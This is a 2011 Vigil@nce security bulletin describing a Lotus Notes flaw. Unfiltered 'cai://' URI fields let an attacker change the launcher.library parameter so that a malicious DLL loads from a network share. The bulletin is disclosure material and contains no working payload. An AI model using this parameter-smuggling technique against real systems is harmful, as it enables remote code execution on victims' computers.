Vigil@nce - Lotus Notes: buffer overflow via cai
February 2011 by Vigil@nce
This bulletin was written by Vigil@nce : http://vigilance.fr/
SYNTHESIS OF THE VULNERABILITY
An attacker can invite the victim to open a malicious "cai" uri,
in order to execute code on his computer.
Severity: 2/4
Creation date: 07/02/2011
Revision date: 08/02/2011
IMPACTED PRODUCTS
– Lotus Notes
DESCRIPTION OF THE VULNERABILITY
Uris of type "cai://" are used to launch a composite application,
or to access to a page:
cai://[GUID]/[PageId]pagealias=abchint=def
When Lotus Notes analyzes a malicious "cai" uri, fields are not
filtered. An attacker can thus alter the content of the
"—launcher.library" parameter, in order to load a malicious DLL
library located on a network share.
An attacker can therefore invite the victim to open a malicious
"cai" uri, in order to execute code on his computer.
ACCESS TO THE COMPLETE VIGIL@NCE BULLETIN
http://vigilance.fr/vulnerability/Lotus-Notes-buffer-overflow-via-cai-10332